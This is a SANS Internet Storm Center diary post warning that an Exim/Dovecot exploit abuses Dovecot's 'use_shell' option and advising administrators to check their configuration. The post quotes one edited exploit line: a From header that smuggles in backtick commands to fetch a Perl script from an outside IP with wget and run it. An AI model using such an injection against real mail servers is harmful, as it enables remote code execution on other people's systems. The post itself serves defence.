Threat Level: green Handler on Duty: Brad Duncan

SANS ISC: InfoSec Handlers Diary Blog - SANS Internet Storm Center InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Exim/Dovecot exploit making the rounds

Published: 2013-06-07
Last Updated: 2013-06-07 14:18:12 UTC
by Joel Esler (Version: 1)
2 comment(s)

One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server.  The exploit partially looked like this:

From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com

(Obviously edited for your safety, and I didn't post the whole thing.)

This is an exploit against Dovecot that is using the feature "use_shell" against itself.  This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration.  We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell" parameter.  Or if you are, make darn sure you know what you are doing, and how to defend yourself.

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

Keywords:
2 comment(s)
Diary Archives